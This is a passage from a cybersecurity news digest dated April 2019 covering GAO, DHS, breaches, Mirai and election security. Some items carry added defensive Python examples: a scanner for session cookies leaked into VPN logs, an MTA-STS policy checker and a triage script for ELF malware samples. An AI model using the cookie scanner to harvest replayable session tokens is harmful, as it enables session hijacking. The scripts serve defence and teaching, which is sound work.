Officials discuss the challenges and opportunities of tax administration in a more globalized and technologically advanced world, addressing data analytics and service delivery.
Federal News Network, April 12, 2019
The Government Accountability Office is on track to achieve its optimal workforce
capacity of 3,250 full-time employees this year, but it’s still having trouble
keeping up with the quantity of lawmaker requests around new technologies and
cybersecurity. Comptroller General of the United States and head of the GAO
Gene Dodaro told the Senate Appropriations Legislative Branch subcommittee that
those are two of GAO’s four major priorities for 2020, where it needs to
increase capacity to meet rising demand. The agency requested a funding
increase of $57.8 million more than it received in fiscal 2019, for a total of
$647.6 million, in order to build these capacities. Dodaro reminded lawmakers
that in 2018, actions on GAO recommendations saved the government $75.1
billion, a return on investment of more than $124 for every $1 GAO received in
funding.
FCW, April 11, 2019
Navy Secretary Richard Spencer says adding a new assistant secretary for
cybersecurity and tightening contractors' security practices are top priorities
for 2020. Spencer told Congress April 10 that a new assistant secretary for
cyber would help centralize the service's current efforts and build an
implementable cybersecurity policy structure. "When it comes to a fifth
assistant secretary [for cyber]," Spencer told the House Armed Services
Committee, "that will be a compilation of what we have in the organization
already at the secretariat level." Spencer didn't provide many details on
how the new position would work but expressed concern over security gaps in the
defense industrial base.
Gov Info Security
Over the last four years, the Government Accountability Office has made hundreds of
recommendations to the Department of Health and Human Services for improving
its operations that have not been implemented. In a March 28 letter and report
sent to HHS, GAO notes that among dozens of unimplemented "high
priority" recommendations are four on health information technology and
cybersecurity. "The nation's critical infrastructure provides the
essential services - including healthcare - that underpin American society. The
infrastructure relies extensively on computerized systems and electronic data
to support its missions," GAO writes. "However, serious cybersecurity
threats to the infrastructure continue to grow and represent a significant
national security challenge. Additionally, recent data breaches have
highlighted the importance of ensuring the security of health information,
including Medicare beneficiary data." Such critical data is created,
stored, and used by a wide variety of entities, such as healthcare providers,
insurance companies, financial institutions, researchers and others, GAO notes.
Nextgov
A bipartisan bill introduced on Monday would require the Homeland Security
Department to fund efforts by state and local governments to boost their cyber
defenses. The Cyber Resiliency Act would create a federal grant program to
support cybersecurity upgrades for governments that often lack the resources to
fund their own endeavors. It would also mandate states that participate in the
program work to improve recruitment and retention in their cyber workforce. “As
cyberattacks increase in frequency and gravity, we must ensure that our
nation—from our local governments on up—is adequately prepared to protect
public safety and combat cyber threats,” said Sen. Mark Warner, D-Va., who
cosponsored the bill with Sen. Cory Gardner, R-Colo. “Nearly 70 percent of states
have reported that they lack adequate funding to develop sufficient
cybersecurity. This bill will aim to mitigate that need by providing grants to
state and local jurisdictions so that they are better prepared to take on these
emerging challenges.” Reps. Derek Kilmer, D-Wash., and Michael McCaul, R-Texas,
introduced companion legislation in the House. A similar bill was introduced
during the last Congress but never made it out of committee.
Gov Info Security
The lack of a strong security culture at Equifax - especially compared to its two main
competitors - was a key factor contributing to its 2017 data breach that
exposed the personal records of 145 million Americans, according to a 71-page
Congressional report. The newly released report from the U.S. Senate Permanent
Subcommittee on Investigations concluded, much like an earlier Government
Accountability Office report, that Equifax failed to follow its own
cybersecurity policies, including those spelling out how and when to patch
critical software vulnerabilities. Company executives did not prioritize
security, and many key decisions were left to lower-level IT employees, the new
report concludes. "Based on this investigation, the subcommittee concludes
that Equifax's response to the March 2017 cybersecurity vulnerability that
facilitated the breach was inadequate and hampered by Equifax's neglect of
cybersecurity," the report states. "Equifax's shortcomings are
longstanding and reflect a broader culture of complacency toward cybersecurity
preparedness." The report also notes that due to missing documents and
internal chat logs, a full understanding of what happened could not be
achieved.
ADMINISTRATION
CyberScoop, April 12, 2019
The Department of Homeland Security on Friday alerted the public to a vulnerability
in multiple virtual private network applications that could give a hacker
access to other apps running on a VPN connection. The flaw involves the
insecure storage of cookies in memory or in log files, and affects enterprise
VPN apps made by Cisco, F5 Networks, Palo Alto Networks, and Pulse Secure.
Other vendors could be affected because the configuration issue is likely
“generic” to other VPN apps, according to an advisory cited by DHS from
Carnegie Mellon University’s CERT Coordination Center. “If an attacker has
persistent access to a VPN user’s endpoint or exfiltrates the cookie using
other methods, they can replay the session and bypass other authentication
methods,” CERT CC said. “An attacker would then have access to the same
applications that the user does through their VPN session.” While Palo Alto
Networks had patched its VPN product, the other vendors had not, according to
CERT CC. The added attention brought by the advisory could change that.
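To make the advisory's "cookies in log files" point concrete, here is an added example (my code, not from the CERT/CC advisory or any of the named vendors) of the kind of check a defender can run over a VPN client's log directory: it flags HTTP cookie headers written to the log and long high-entropy strings that look like replayable session material, and can redact them before a log is shared. The log lines are constructed for illustration; the header names, the token pattern and the entropy threshold are my assumptions, not anything the advisory specifies.

```python
import math
import re

# Constructed sample log lines (not from any real VPN client). Line 3 leaks a
# session cookie verbatim; line 5 leaks a bare token with no header name.
SAMPLE_LOG = """\
2019-04-12 09:01:02 INFO  connecting to vpn.example.com:443
2019-04-12 09:01:03 DEBUG GET /remote/login HTTP/1.1
2019-04-12 09:01:04 DEBUG Set-Cookie: SVPNCOOKIE=Y2xpZW50LXNlc3Npb24tMDAwMS1yZXBsYXlhYmxl; Secure; HttpOnly
2019-04-12 09:01:04 INFO  tunnel established, assigned 10.8.0.17
2019-04-12 09:02:10 DEBUG auth-token 8f3a1c9e4b7d2f60a1e5c3b9d7f2e4a6c8b0d1f3
2019-04-12 09:05:00 INFO  keepalive ok
"""

# Assumed patterns: an explicit cookie header, or a bare run of >= 32 token-ish chars.
COOKIE_HEADER = re.compile(r"\b(Set-Cookie|Cookie):\s*([^;\s]+)", re.IGNORECASE)
BARE_TOKEN = re.compile(r"\b[A-Za-z0-9+/=_-]{32,}\b")


def shannon_entropy(s):
    """Bits per character; random base64/hex tokens score well above prose."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_cookie_leaks(log_text, entropy_threshold=3.5):
    """Return (line_no, kind, value) for every suspected credential leak.

    kind is 'cookie' for an explicit HTTP cookie header and 'token' for a
    long high-entropy string that looks like session material. The 3.5-bit
    threshold is an assumption tuned to the constructed sample."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        m = COOKIE_HEADER.search(line)
        if m:
            findings.append((no, "cookie", m.group(2)))
            continue  # do not report the same value twice as a bare token
        for tok in BARE_TOKEN.findall(line):
            if shannon_entropy(tok) >= entropy_threshold:
                findings.append((no, "token", tok))
    return findings


def redact(log_text):
    """Same scan, but return the log with leaked values replaced, for safe sharing."""
    leaks = {value for _, _, value in find_cookie_leaks(log_text)}
    out = []
    for line in log_text.splitlines():
        for value in leaks:
            line = line.replace(value, "<REDACTED>")
        out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    for line_no, kind, value in find_cookie_leaks(SAMPLE_LOG):
        print("line %d: %s %s..." % (line_no, kind, value[:12]))
```

A hit on a client log means that anyone who can read the user's profile (malware, a backup, a support bundle uploaded to a ticket) can replay the VPN session without the password or second factor, which is the scenario CERT/CC describes; the redaction step is what a support team should run before a log leaves the machine.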
StateScoop, April 12, 2019
North Dakota Gov. Doug Burgum signed a bill Friday making his state’s Information
Technology Department the first in the country to manage cybersecurity
operations across all of the state’s public organizations, including local
governments, schools, courts and the state legislature. The law’s enactment
leaves ITD with the broadest cybersecurity mission of any state government IT
division in the country. North Dakota’s shared network, called STAGEnet, hosts
more than 250,000 users in approximately 400 public-sector organizations across
the state. Burgum, a former software executive who sold his company to
Microsoft in 2001 for $1.1 billion, said in a press release that the change
will help protect the state’s network amid the “growing nature of
cybersecurity threats.”
The New York Times
The WikiLeaks founder Julian Assange was arrested on Thursday in London to face a
charge in the United States of conspiring to hack into a Pentagon computer network
in 2010, bringing to an abrupt end a seven-year saga in which he had holed up
in Ecuador’s embassy in Britain to avoid capture. The Ecuadorean government
suspended the citizenship it had granted Mr. Assange and evicted him on
Thursday, clearing the way for his arrest. His hosts had displayed growing
impatience, listing grievances including recent WikiLeaks releases they said
interfered with other states’ internal affairs and personal discourtesies, like
the failure of Mr. Assange to clean the bathroom and look after his cat. A
bedraggled and shackled Mr. Assange, 47, was dragged out of the embassy. At a
court hearing, a judge swiftly found him guilty of jumping bail, and he was
detained partly in connection with an American extradition warrant. Mr. Assange
indicated that he would fight extradition, and legal experts said that process
could take years. He is likely to argue that the case is politically motivated
rather than driven by legitimate legal concerns.
Wired, April 11, 2019
This week kicked off a new, chaotic era at the Department of Homeland Security, where the
only certainty seems to be the president’s obsession with immigration. As
former Customs and Border Protection commissioner and prominent
family-separation advocate Kevin McAleenan takes over as acting secretary, it’s
fair to wonder what will happen to the rest of DHS’ many essential
responsibilities. The shakeup began last week, when President Trump announced
he was withdrawing his nominee to head Immigration and Customs Enforcement,
Ronald Vitiello, saying, “We’re going in a tougher direction.” Then on Sunday
he ousted former secretary Kirstjen Nielsen, after months of rumors that he was
unhappy with her performance. Secret Service director Randolph Alles and DHS
undersecretary Claire Grady are also out, and there may still be more to come.
But DHS’ mandate goes far beyond immigration, to concerns like cybersecurity,
counterterrorism, monitoring critical infrastructure, border privacy, and the
development of science and technology in defense of the country. While Trump’s
Homeland Security purge may not mean an immediate danger of those areas being
neglected, former government officials worry about the long-term consequences
of the hollowing out and restructuring of DHS.
FCW, April 11, 2019
The Air Force is rolling out seven new competitive career categories for officers that
will include cyber, intelligence, and space as a way to boost promotion,
training and talent retention, the service announced April 11. "There
needs to be different paths for the development of our career fields," Lt.
Gen. Brian Kelly, Air Force deputy chief of staff for manpower, personnel, and
services, told reporters at a media roundtable event. "The things that we
value and the things that we need to emphasize between career fields might not
always be the same." The initiative, which has been underway for nearly
two years, will allow officers to compete for promotion against others in their
career field who have similar duties and skills, rather than across the entire
Air Force. "We can't have a one-size-fits-all developmental path,"
Kelly said, "to reach our potential in all of these areas." The new
categories include cybersecurity, space, intelligence and others yet to be
named. They're expected to debut later this spring at the earliest, Kelly said.
Ars Technica, April 10, 2019
A joint intelligence bulletin (JIB) has been issued by the Department of Homeland
Security and Federal Bureau of Investigation to state and local authorities
regarding Russian hacking activities during the 2016 presidential election.
While the bulletin contains no new technical information, it is the first
official report to confirm that the Russian reconnaissance and hacking efforts
in advance of the election went well beyond the 21 states confirmed in previous
reports. As reported by the intelligence newsletter OODA Loop, the JIB stated
that, while the FBI and DHS "previously observed suspicious or malicious
cyber activity against government networks in 21 states that we assessed was a
Russian campaign seeking vulnerabilities and access to election
infrastructure," new information obtained by the agencies "indicates
that Russian government cyber actors engaged in research on—as well as direct
visits to—election websites and networks in the majority of US states."
While not providing specific details, the bulletin continued, "The FBI and
DHS assess that Russian government cyber actors probably conducted research and
reconnaissance against all US states’ election networks leading up to the 2016
Presidential elections."
Nextgov
The Internal Revenue Service, which has struggled for years to get a handle on the
criminal theft of taxpayer identity information, on Monday released encouraging
numbers on results of its Security Summit partnership with states and industry.
“At a time when many in the private sector continue to struggle with these
issues, the tax community has made major progress working together to stop
identity theft and refund fraud,” IRS Commissioner Chuck Rettig
said. “In 2018, our partnership protected more taxpayers and more tax dollars
from tax-related identity theft.” The partnership with state tax agencies and
private-sector cyber-specialists, launched in 2015, created an Identity Theft Tax Refund
Fraud Information Sharing and Analysis Center (ISAC) that now consists of 65 groups,
the IRS noted. It has been tackling a problem that threatens individuals,
companies and tax preparers, at a time when the agency’s programs to thwart
identity theft have appeared on the high-risk list of the Government
Accountability Office.
Fifth Domain
U.S. Cyber Command focuses on deterring cyberthreats from impacting the homeland, but
could hold less direct authority if an internal threat targets the critical
infrastructure of a state. That’s why 40 states have representatives in an
annual large-scale cyber exercise that kicked off late last week. Cyber Shield
19, which runs until April 20, brings together members of the National Guard,
who answer to the governors of their respective states, and has them work with
industry to improve incident response to cyber events. “The purpose is to
develop and train internal defensive measures, incident response, coordinate
train and assist activities,” Brig. Gen. Jeffrey Burkett, vice director of
domestic operations for the National Guard Bureau, told reporters April 9
during a briefing at the Pentagon. “It’s a collective training event for us. It
will enhance our war-fighting skills and that’s very important to us.”
The Minneapolis Star Tribune, April 9, 2019
A data breach last year at the state agency that oversees Minnesota’s health and
welfare programs may have exposed the personal information of approximately
11,000 individuals. The state Department of Human Services (DHS) notified
lawmakers Tuesday that an employee’s e-mail account was compromised as a result
of a cyberattack on or about March 26, 2018. A hacker unlawfully logged into a
state e-mail account of a DHS employee and used it to send two e-mails to one
of the employee’s co-workers, asking that co-worker to pay an “invoice” by
wiring money. The agency has no evidence that personal information contained in
the hacked e-mail account was “viewed, downloaded or misused in any way,” Human
Services Commissioner Tony Lourey said in a letter to legislative leaders on
Tuesday. Even so, the hacker would have had the ability to obtain some of the
account’s contents during the cyberattack, officials said.
INDUSTRY
NPR, April 12, 2019
Technology theft and other unfair business practices originating from China are costing
the American economy more than $57 billion a year, White House officials
believe, and they expect that figure to grow. Yet an investigation by NPR and
the PBS television show Frontline into why three successive administrations
failed to stop cyberhacking from China found an unlikely obstacle for the
government — the victims themselves. In dozens of interviews with U.S.
government and business representatives, officials involved in commerce with
China said hacking and theft were an open secret for almost two decades,
allowed to quietly continue because U.S. companies had too much money at stake
to make waves. Wendy Cutler, who was a veteran negotiator at the Office of the U.S.
Trade Representative, says it wasn't just that U.S. businesses were hesitant to
come forward in specific cases. She says businesses didn't want the trade
office to take "any strong action." "We are not as effective if
we don't have the U.S. business community supporting us," she says.
"Looking back on it, in retrospect, I think we probably should have been
more active and more responsive. We kind of lost the big picture of what was
really happening."
Reuters, April 12, 2019
Norsk Hydro, one of the world’s largest aluminum makers, will postpone its
first-quarter earnings report by more than a month as it struggles to recover
from a March cyber attack, the company said on Friday. Hydro now aims to
publish its results on June 5, five weeks later than planned, as it tries to
gain access to administrative systems for reporting, billing and invoicing that
were blocked by hackers demanding a ransom. The company has maintained it will
not pay to regain access to its computers and servers, preferring instead to
repair data from backup systems. “The revised date is conditional upon the
planned timeline for restoring operational and reporting systems,” Hydro said
in a statement. “With 35,000 employees, operations in 40 countries on all
continents and several thousand servers in the company, full recovery is a
complex and time-consuming process,” Chief Information Officer Jo De Vliegher
said. “We are well on our way, but it will take time before we are fully back
to normal IT operations,” he added.
CyberScoop, April 12, 2019
A popular form of crowdsourcing might have a problem with the size of its crowd. Most of
the high-value digital security vulnerabilities reported to bug-bounty programs
are found by just a fraction of the freelance researchers who participate in
those contests, recent reports show, suggesting that there are not enough
skilled bounty hunters to handle the available work. The trend has big
implications for an industry that has come to expect regular growth over the
past half-decade. For the companies, it means their customers — corporations
such as Fiat Chrysler, LinkedIn, Starbucks and others — are paying to hear
about lots of low-severity bugs while more critical problems potentially remain
undiscovered. The latest numbers come from the 2019 Hacker Report by HackerOne,
one of the leading bug bounty platforms along with Bugcrowd and Synack.
ZDNet, April 11, 2019
Google announced today that Gmail has become the first major email provider to support
two new security standards, MTA-STS (RFC 8461) and TLS Reporting (TLS-RPT, RFC 8460). Both
layer on top of the Simple Mail Transfer Protocol (SMTP), the protocol through which mail
is relayed between servers. Server-to-server TLS in SMTP is opportunistic: a sender uses
STARTTLS only if the receiver offers it and typically does not verify the certificate, so
an on-path attacker can strip the STARTTLS offer or present a bogus certificate and then
intercept, read, and modify mail in transit. MTA-STS closes that gap by letting a receiving
domain publish a policy (a DNS TXT record plus a policy file served over HTTPS) that tells
senders its mail must arrive over TLS with a valid certificate for the listed MX hosts, so a
downgrade becomes a hard failure rather than a silent fallback to plaintext. TLS-RPT lets the
sender report those failures back to the receiving domain, so misconfiguration and
interference become visible instead of going unnoticed.
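As an added example of the mechanics (my code, not Google's or anything from the article), the block below does what a policy-aware sending MTA does once it has the receiving domain's records in hand: parse the `_mta-sts` TXT record and the policy file, parse the TLS-RPT record to learn where failure reports go, match the MX host against the policy's patterns (including the one-label wildcard rule of RFC 8461), and decide whether a connection that lacks STARTTLS or a trusted certificate is delivered anyway (testing mode) or refused (enforce mode). The domain names, records and policy are constructed; the failure-type names are the RFC 8460 result types, and mapping an MX not covered by the policy onto the catch-all `validation-failure` is my choice. DNS lookup and the HTTPS fetch are left out so the example runs offline.

```python
# Constructed sample data (not from any real domain): the TXT record a sender
# finds at _mta-sts.example.com, the policy file it then fetches from
# https://mta-sts.example.com/.well-known/mta-sts.txt, and the TLS-RPT record
# published at _smtp._tls.example.com.
STS_TXT = "v=STSv1; id=20190411T000000;"
STS_POLICY = """\
version: STSv1
mode: enforce
mx: mail.example.com
mx: *.backup-mx.example.net
max_age: 604800
"""
TLSRPT_TXT = "v=TLSRPTv1; rua=mailto:tlsrpt@example.com,https://tlsrpt.example.com/v1"


def parse_kv_record(record):
    """'k=v; k2=v2' (the shape both TXT records share) -> dict."""
    fields = {}
    for part in record.split(";"):
        part = part.strip()
        if part:
            key, _, value = part.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def parse_sts_txt(record):
    """Return the policy id; a changed id tells cached senders to refetch."""
    fields = parse_kv_record(record)
    if fields.get("v") != "STSv1" or not fields.get("id"):
        raise ValueError("not a valid MTA-STS TXT record")
    return fields["id"]


def parse_tlsrpt_txt(record):
    """Return the list of report destinations (mailto: or https: URIs)."""
    fields = parse_kv_record(record)
    if fields.get("v") != "TLSRPTv1" or "rua" not in fields:
        raise ValueError("not a valid TLS-RPT TXT record")
    return [uri.strip() for uri in fields["rua"].split(",")]


def parse_policy(text):
    """Parse the mta-sts.txt body and enforce the RFC 8461 required fields."""
    policy = {"mx": []}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed policy line: %r" % line)
        key, value = key.strip(), value.strip()
        if key == "mx":
            policy["mx"].append(value.lower().rstrip("."))
        else:
            policy[key] = value
    if policy.get("version") != "STSv1":
        raise ValueError("unsupported policy version")
    if policy.get("mode") not in ("enforce", "testing", "none"):
        raise ValueError("invalid mode")
    if not policy.get("max_age", "").isdigit():
        raise ValueError("max_age must be a non-negative integer")
    policy["max_age"] = int(policy["max_age"])
    if policy["mode"] != "none" and not policy["mx"]:
        raise ValueError("enforce/testing policy needs at least one mx")
    return policy


def mx_matches(policy, mx_host):
    """RFC 8461 section 4.1: '*.example.com' matches exactly one leftmost label,
    so it covers mx1.example.com but neither example.com nor a.b.example.com."""
    host = mx_host.lower().rstrip(".")
    for pattern in policy["mx"]:
        if pattern.startswith("*."):
            suffix = pattern[1:]  # e.g. ".backup-mx.example.net"
            label = host[:-len(suffix)] if host.endswith(suffix) else ""
            if label and "." not in label:
                return True
        elif host == pattern:
            return True
    return False


def decide_delivery(policy, mx_host, starttls_offered, cert_valid_for_mx):
    """Outcome of one connection attempt: (deliver, failure_types).

    failure_types use RFC 8460 result-type names, i.e. what a TLS-RPT report
    carries. An MX outside the policy is mapped to the generic
    'validation-failure' here (my choice); in enforce mode a real sender
    would simply not use that MX at all."""
    if policy["mode"] == "none":
        return True, []
    failures = []
    if not mx_matches(policy, mx_host):
        failures.append("validation-failure")
    if not starttls_offered:
        failures.append("starttls-not-supported")
    elif not cert_valid_for_mx:
        failures.append("certificate-not-trusted")
    if not failures:
        return True, []
    # testing: deliver anyway but report; enforce: refuse and report
    return policy["mode"] == "testing", failures


if __name__ == "__main__":
    pol = parse_policy(STS_POLICY)
    for host in ("mail.example.com", "mx2.backup-mx.example.net", "rogue.example.org"):
        print(host, decide_delivery(pol, host, True, True))
```

The practical lesson for a receiving domain is the mode field: publish in `testing` first and watch the TLS-RPT reports, because a policy that lists the wrong MX names or a certificate that does not match them will, in `enforce` mode, stop legitimate senders from delivering mail at all.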
Ars Technica, April 10, 2019
Sixteen months ago, researchers reported an unsettling escalation in hacks targeting
power plants, gas refineries, and other types of critical infrastructure.
Attackers who may have been working on behalf of a nation caused an operational
outage at a critical-infrastructure site after deliberately targeting a system
that prevented health- and life-threatening accidents. There had been
compromises of critical infrastructure sites before. What was unprecedented in
this attack—and of considerable concern to some researchers and critical
infrastructure operators—was the use of an advanced piece of malware that
targeted the unidentified site’s safety processes. Such safety instrumented
systems (SIS) are a combination of hardware and software that many critical infrastructure
sites use to prevent unsafe conditions from arising. When gas fuel pressures or
reactor temperatures rise to potentially unsafe thresholds, for instance, a SIS
will automatically close valves or initiate cooling processes to prevent
health- or life-threatening accidents. Now, researchers at FireEye—the same
security firm that discovered Triton and its ties to Russia—say they have
uncovered an additional intrusion that used the same malicious software
framework against a different critical infrastructure site. As was the case in
the first intrusion, the attackers focused most of their resources on the
facility’s OT, or operational technology, which are systems for monitoring and
managing physical processes and devices.
CyberScoop, April 10, 2019
It’s just like the old saying: When you can’t hire them, offer to pay their student loan
debt. Microsoft, Mastercard and Workday announced this week they’ve teamed with
11 federal government agencies as part of a Cybersecurity Talent Initiative
meant to fill hundreds of thousands of open cybersecurity jobs. Graduating
college students can apply for a two-year placement in a security role at the
FBI, CIA or another agency. At the end of that two years they’ll be eligible
for a position at one of those three companies, which will pay up to $75,000 of
their student loan debt as part of their deal. The Cybersecurity Talent
Initiative appears to be unique in the way it offers student loan assistance,
but it’s hardly the only corporate effort meant to enhance an enterprise’s
security posture.
The Wall Street Journal, April 9, 2019
DTE Energy Co., PG&E Corp. and a municipal utility in Missouri broke rules designed to
protect the nation’s electric system from cyber and physical attacks and were
sanctioned by federal regulators, according to newly released documents and
people knowledgeable about the cases. Penalty cases are not uncommon, but what
is unusual is that the public is learning the operators’ identities. Most
violators’ names are kept confidential in a system designed to encourage
self-disclosure of infractions by the utilities.
Reuters, April 9, 2019
Yahoo has struck a revised $117.5 million settlement with millions of people whose email
addresses and other personal information were stolen in the largest data breach
in history. The proposed class-action settlement made public on Tuesday was
designed to address criticisms of U.S. District Judge Lucy Koh in San Jose,
California. She rejected an earlier version of the accord on Jan. 28, and her
approval is still required. Koh said the original settlement was not
"fundamentally fair, adequate and reasonable" because it had no
overall dollar value and did not say how much victims might expect to recover.
She also said the legal fees appeared to be too high. Yahoo, now part of New
York-based Verizon Communications Inc, had been accused of being slow to
disclose three data breaches affecting about 3 billion accounts from 2013 to
2016.
Bloomberg, April 9, 2019
It helped Mexico track down El Chapo, but it’s also been accused of assisting Saudi
Arabia spy on dissidents. Now NSO Group, hackers-for-hire likened to a private
intelligence service, has become a strain for two Wall Street banks that helped
fund a buyout of the Israel-based company last month. After struggling to find
buyers for a $500 million loan that they agreed to provide, Jefferies Financial
Group Inc. and Credit Suisse Group AG had to come up with the cash themselves
and are now unloading the debt at a steep discount, according to people with
knowledge of the matter. The banks were left holding the loan after increased
public scrutiny of NSO’s most high-profile product: a smartphone-hacking tool
known as Pegasus that has helped make the company hundreds of millions of
dollars from licensing it to foreign governments and intelligence agencies. In
recent weeks, NSO has sought to rebut accusations that Pegasus has been used by
countries to spy on dissidents, including from one Saudi citizen who claims the
software allowed the kingdom to monitor his communications with murdered
journalist Jamal Khashoggi.
CyberScoop, April 9, 2019
If hackers managed to exploit vulnerabilities in widely used Verizon Fios routers, they
would have full control of a wireless home network and access to devices
connected to them, researchers said Tuesday. The new vulnerabilities, uncovered
by cybersecurity company Tenable, point to underlying security issues in
Verizon Fios Quantum Gateway routers, which are given to new customers unless
they opt out. In tinkering with his Fios router, Chris Lyne, a Tenable
researcher, showed how an attacker could change security settings on the router
or capture login requests sent through the device.
Ars Technica, April 9, 2019
Mirai, the “botnet” malware that was responsible for a string of massive distributed
denial of service (DDoS) attacks in 2016—including one against the website of
security reporter Brian Krebs—has gotten a number of recent updates. Now,
developers using the widely distributed "open" source code of the
original have added a raft of new devices to their potential bot armies by
compiling the code for four more microprocessors commonly used in embedded
systems. Researchers at Palo Alto Networks’ Unit 42 security research unit have
published details of new samples of the Mirai botnet discovered in late
February. The new versions of the botnet malware targeted Altera Nios II,
OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. These processors
are used on a wide range of embedded systems, including routers, networked
sensors, baseband radios for cellular communications and digital signal
processors.
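As an added illustration (my code, not from the Unit 42 report or the article), the ELF header of each sample is enough to tell which of these processors a Mirai build targets, because the `e_machine` field names the CPU and `e_ident` gives word size and byte order. That is the first thing a triage script does with a batch of binaries pulled from a dropper's download list, and it is how "new architecture" findings like the one above are made. The sample file names and headers below are constructed for testing, not real malware; the `e_machine` constants are the standard values from the ELF specification.

```python
import struct

# e_machine values from the ELF specification / <elf.h>.
EM_NAMES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC", 40: "ARM",
    42: "SuperH", 62: "x86-64", 92: "OpenRISC", 94: "Tensilica Xtensa",
    113: "Altera Nios II", 183: "AArch64", 189: "Xilinx MicroBlaze",
}
# The four targets the item above reports as new for Mirai.
NEW_MIRAI_TARGETS = {92, 94, 113, 189}


def elf_arch(blob):
    """Return (word_size_bits, endianness, machine_name, e_machine) or raise.

    Only the first 20 bytes (e_ident, e_type, e_machine) are read, so this
    works on a truncated download or a header-only capture."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("malformed e_ident")
    endian = "<" if ei_data == 1 else ">"
    _e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return (32 if ei_class == 1 else 64,
            "LE" if ei_data == 1 else "BE",
            EM_NAMES.get(e_machine, "unknown(%d)" % e_machine),
            e_machine)


def triage(samples):
    """Group samples by target CPU and flag those built for the newly added ones."""
    report = {}
    for name, blob in samples.items():
        try:
            bits, endian, arch, em = elf_arch(blob)
        except ValueError as exc:
            report[name] = {"error": str(exc)}
            continue
        report[name] = {"arch": arch, "bits": bits, "endian": endian,
                        "new_target": em in NEW_MIRAI_TARGETS}
    return report


def make_elf_header(e_machine, big_endian=False, bits=32):
    """Build a minimal, constructed ELF header for testing (not a real sample).
    e_ident: magic, class, data, version, then 9 bytes of OS/ABI and padding."""
    ident = (b"\x7fELF"
             + bytes([1 if bits == 32 else 2, 2 if big_endian else 1, 1])
             + b"\x00" * 9)
    endian = ">" if big_endian else "<"
    return ident + struct.pack(endian + "HH", 2, e_machine)  # ET_EXEC, machine


# Constructed batch, named the way a dropper script typically names its payloads.
SAMPLES = {
    "mirai.arm": make_elf_header(40),
    "mirai.mpsl": make_elf_header(8),
    "mirai.xtensa": make_elf_header(94),
    "mirai.mb": make_elf_header(189, big_endian=True),
    "mirai.or1k": make_elf_header(92, big_endian=True),
    "mirai.nios2": make_elf_header(113),
    "notes.txt": b"just text",
}

if __name__ == "__main__":
    for name, info in triage(SAMPLES).items():
        print(name, info)
```

Endianness matters as much as the machine number: MicroBlaze and OpenRISC builds are commonly big-endian, so a script that hard-codes little-endian unpacking will misread `e_machine` for exactly the samples the report is about.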
Wired, April 9, 2019
In March 2017, the Android security team was feeling pleased with itself. The group had
detected, analyzed, and neutralized a sophisticated botnet built on tainted
apps that all worked together to power ad and SMS fraud. Dubbed Chamois, the
malware family had already cropped up in 2016 and was being distributed both
through Google Play and third-party app stores. So the Android team started
aggressively flagging and helping to uninstall Chamois until they were sure it
was dead. Eight months later, though, in November 2017, Chamois roared back
into the Android ecosystem, more ferocious than before. By March 2018, a year
after Google thought it had been vanquished, Chamois hit an all-time high,
infecting 20.8 million devices. Now, a year after that zenith, the Android team
has whittled that number back down to fewer than 2 million infections. And at
the Kaspersky Security Analyst Summit in Singapore this week, Android security
engineer Maddie Stone is presenting a full post-mortem on how Google fought
back against Chamois—again—and how personal the rivalry became.
CyberScoop, April 9, 2019
At a time when corporations are planning to blanket the heavens with high-tech hardware,
the space industry is responding with the creation of an information sharing
and analysis center — a nonprofit organization that helps to track cyberthreats
for member companies and related government agencies. The Space Information
Sharing and Analysis Center (S-ISAC) will be housed in Colorado Springs,
Colorado, within the National Cybersecurity Center, itself a nonprofit,
nongovernmental organization created to improve awareness about securing cyberspace.
S-ISAC has not released much public information about how it plans to
coordinate the space industry around its mission, but a news release from its
founding company — Kratos Defense and Security Solutions — says the ISAC was
created in response to long-recognized “information sharing gaps within the
cybersecurity and space community.”
INTERNATIONAL
AP, April 11, 2019
Spanish Prime Minister Pedro Sánchez on Tuesday called on all political forces in the
country to back a new national cybersecurity fight against "attempts to
hack democracy and undermine citizens' trust in the political system." Spain's
April 28 general election is seen as a testing ground for new measures that the
European Union is adopting to shield elections to the European Parliament a
month later. The Europe-wide efforts include a "rapid alert system"
linking specialized coordination units in all EU member states and require
internet companies to share regular updates on their efforts to eradicate
disinformation campaigns. Spain joined the Europe-wide initiative in early
March, establishing a high-level unit to coordinate the fight against
cyberattacks and fake news. The experts report directly to Sánchez, who on
Tuesday equated disinformation to attacks on "the quality of
democracy."
CyberScoop, April 10, 2019
Department of Homeland Security and FBI officials are warning industry about what they say
are new Trojan malware variants that North Korean-government-backed hackers
have deployed as part of their global operations. The variants employ proxy
applications to mask communications between the malicious programs and their
operators, DHS said in a report published Wednesday. When executed, the malware
collects information on the victim machine’s operating system and its system
time, and uses a public SSL certificate for secure communication with its
operators, the report said. DHS has dubbed the new malware HOPLIGHT. “This is
continuing our campaign to put pressure on the DPRK as well as helping network
defenders understand some of the tools and the capabilities that they are
using,” Jeanette Manfra, assistant director for cybersecurity at DHS’s
Cybersecurity and Infrastructure Security Agency, told CyberScoop.
The Washington Post, April 9, 2019
The Czech Republic’s highest court says a former justice minister violated the rights of
an alleged Russian hacker by allowing his extradition to the U.S. before a
separate asylum case was finalized. Yevgeniy Nikulin is accused of hacking
computers at LinkedIn, Dropbox and other American companies in 2012,
compromising the personal information of millions of Americans. The
Constitutional Court said Tuesday that then Justice Minister Robert Pelikan
allowed Nikulin’s extradition before his asylum request went through the court
system. Nikulin was later denied asylum. He was extradited to the U.S. in March
2018. Pelikan is no longer justice minister and won’t face any punishment.
Fifth Domain, April 8, 2019
NATO’s cybersecurity arm is set to launch a four-day exercise April 9 that simulates
the response to hackers sowing chaos in a fictitious country conducting
national elections. The scenario places the country of Berylia in a
“deteriorating security situation” as people go to the polls, according to a
NATO statement. Hostile actors launch coordinated attacks against the country’s
civilian communications infrastructure, causing disruptions in water
